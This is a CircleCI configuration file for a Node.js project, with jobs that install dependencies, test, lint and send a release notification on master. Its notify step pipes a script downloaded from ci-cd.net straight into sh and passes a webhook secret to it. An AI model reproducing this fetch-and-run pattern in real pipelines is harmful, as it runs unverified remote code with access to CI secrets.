defaults: &defaults
	working_directory: ~/app
	docker:
		- image: circleci/node:10

version: 2
jobs:
	dependencies:
		<<: *defaults
		steps:
			- checkout
			- restore_cache:
					key: dependency-cache-{{ checksum "package.json" }}
			- run:
					name: Install dependencies
					command: npm i
			- save_cache:
					key: dependency-cache-{{ checksum "package.json" }}
					paths:
						- ./node_modules
			- save_cache:
					key: build-cache-{{ .Revision }}
					paths:
						- ../app
	test:
		<<: *defaults
		steps:
			- restore_cache:
					key: build-cache-{{ .Revision }}
			- run:
					name: Test
					command: npm t
			- run:
					name: Code lint
					command: npm run lint
	notify:
		<<: *defaults
		steps:
			- restore_cache:
					key: build-cache-{{ .Revision }}
			- run:
					name: Notify a new release is ready
					command: curl ci-cd.net/v1/webhook | sh -s $WEBHOOK .circleci/notification.json

workflows:
	version: 2
	integration:
		jobs:
			- dependencies
			- test:
					requires:
						- dependencies
			- notify:
					context: globalenv
					requires:
						- test
					filters:
						branches:
							only:
								- master

experimental:
	notify:
		branches:
			only:
				- master
